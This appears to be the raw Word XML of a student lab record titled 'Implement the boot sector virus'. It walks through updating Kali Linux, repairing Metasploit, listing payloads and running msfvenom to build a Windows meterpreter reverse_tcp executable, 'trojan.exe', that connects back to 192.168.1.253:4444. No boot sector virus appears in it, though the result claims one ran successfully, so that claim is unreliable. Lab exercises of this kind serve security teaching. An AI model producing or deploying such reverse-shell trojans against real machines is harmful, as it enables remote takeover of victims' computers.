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84F06" w14:textId="4EA30209" w:rsidR="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C7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256EA8F1" w14:textId="4F7D9A89" w:rsidR="00F408C7" w:rsidRPr="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C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IMPLEMENT THE BOOT SECTOR VIRUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2153ED1C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2BBC108F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68D3F911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AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706E715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ab/>
      </w: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To implement boot sector virus.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDBC54E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PROCEDURE:           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D0F69" w14:textId="77777777" w:rsidR="00F408C7" w:rsidRPr="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C7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en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Select Root Terminal   Emulator  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB51353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 1: Update and Upgrade Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB32B60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Open the terminal and type </w:t>
      </w:r>
      <w:proofErr w:type="gram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in :</w:t>
      </w:r>
      <w:proofErr w:type="gram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sudo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apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093BBA4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Next, type in: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sudo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apt-get upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E928480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 3: Fix any errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F22182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If you see this, it means that bundler is either set up incorrectly or hasn’t been updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC2735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To fix this, change the current directory (file) to </w:t>
      </w:r>
      <w:proofErr w:type="spell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usr</w:t>
      </w:r>
      <w:proofErr w:type="spell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/share/</w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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-framework by typing in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878F1D2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    &gt;&gt; cd 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usr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/share/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metasploit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-framework/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1EFC3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>from the root directory. If you make a mistake, you can type in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7E9F4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      &gt;&gt; cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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 ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A96EE82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to go back to the previous directory or type in any directory after cd to go there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48EC43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3</w:t>
      </w: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.Now that we are in the </w:t>
      </w:r>
      <w:proofErr w:type="spell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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spell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-framework directory, type in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C83B6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    &gt;&gt; gem install bundler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A758787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to install bundler, then type in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD188A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    &gt;&gt; bundle </w:t>
      </w:r>
      <w:proofErr w:type="gram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install</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22033F73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4</w:t>
      </w:r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>.If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5E608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      &gt;&gt; gem install </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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bundler:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476B726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 xml:space="preserve">and then type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>in :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> </w:t>
      </w:r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gem update –system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CD231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lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>After all of that, everything should work perfectly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F89424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      &gt;&gt; cd /root    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535809F6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to go back to the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382F6E2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</w:p>
    <w:p w14:paraId="5E4D321C" w14:textId="77777777" w:rsidR="00F408C7" w:rsidRPr="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C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 2: Open exploit software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52884EA9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Open up the terminal and type </w:t>
      </w:r>
      <w:proofErr w:type="gram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in :</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w14:paraId="523E9836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 4: Choose our payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46624242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To see a list of </w:t>
      </w:r>
      <w:proofErr w:type="gram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payloads :</w:t>
      </w:r>
      <w:proofErr w:type="gram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-l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294B45E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Step 5: </w:t>
      </w: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Customize our payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8648C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–list-options -p windows/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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51962600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Step 6: </w:t>
      </w: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Generate the virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083CB15C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Now that we have our payload, </w:t>
      </w:r>
      <w:proofErr w:type="spell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ip</w:t>
      </w:r>
      <w:proofErr w:type="spell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address, and port number, we have all the information that we need. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CC45B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Type in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B597CC" w14:textId="77777777" w:rsidR="00F408C7" w:rsidRPr="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D448C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</w:pPr>
      <w:proofErr w:type="spellStart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 -p [payload] LHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F408C7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:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> address] LPORT=[the port number] -f [file type] &gt; [path]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198BAE17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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA26C51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-p windows/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meterpreter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reverse_tcp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LHOST=192.168.1.</w:t>
      </w:r>
      <w:proofErr w:type="gram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253  LPORT</w:t>
      </w:r>
      <w:proofErr w:type="gram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=4444 -f exe  &gt; trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58222F99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</w:p>
    <w:p w14:paraId="3288E80F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If we look in our files using ls, we see that our new file pops up.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFF586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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1B9C1" w14:textId="311A3B8E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1.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</w:p>
    <w:p w14:paraId="4D0AE7BA" w14:textId="1E2FF6C2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3668A070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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="409198BA" wp14:editId="2C9CE7D2">
            <wp:extent cx="5958840" cy="2730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8AB" w14:textId="112FC828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2.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-l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90F7EE" w14:textId="77777777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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A762B5F" wp14:editId="426AAB4F">
            <wp:extent cx="5943600" cy="3555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1A3" w14:textId="77777777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2223C1C" w14:textId="1784187D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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="113AE0B3" wp14:editId="1ACAF531">
            <wp:extent cx="6027420" cy="244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DEE7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603C30DD" w14:textId="711E52E3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35EBCAF" w14:textId="547966E8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506DAA3F" w14:textId="1A29162B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5443CF3" w14:textId="15E2FB24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FC944C8" w14:textId="2760890B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D764369" w14:textId="6C8969CF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3.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-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list-options -p windows/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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="002B6C2D" w14:textId="6EAD211C" w:rsid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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="772D1B2F" wp14:editId="1878D7BB">
            <wp:extent cx="5943600" cy="2326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DFDC" w14:textId="47957B5F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4.</w:t>
      </w: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msfvenom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-p windows/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meterpreter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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spell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LHOST=192.168.1.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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253  LPORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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=4444 -f exe  &gt; trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DC1335" w14:textId="6D21DFD9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1CE19E51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  <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EF8EBEF" wp14:editId="5E802935">
            <wp:extent cx="5943600" cy="893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419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44D83D90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36BE85EB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46246296" w14:textId="77777777" w:rsidR="00F408C7" w:rsidRPr="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C7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F408C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RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6E2A4" w14:textId="77777777" w:rsidR="00F408C7" w:rsidRPr="00F408C7" w:rsidRDefault="00F408C7" w:rsidP="00F408C7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720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proofErr w:type="gramStart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Thus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F408C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the implementation of boot sector virus executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBEFB94" w14:textId="77777777" w:rsidR="00E92E2B" w:rsidRDefault="00E92E2B"/>
    <w:sectPr w:rsidR="00E92E2B" w:rsidSect="00F408C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C7"/>
    <w:rsid w:val="00391F3C"/>
    <w:rsid w:val="00E92E2B"/>
    <w:rsid w:val="00F4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F5CF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AEA04FE9-8B8C-40CD-A06B-E841AD36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317</Words>
  <Characters>1810</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>4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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aishwarya P</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-31T02:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-31T02:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>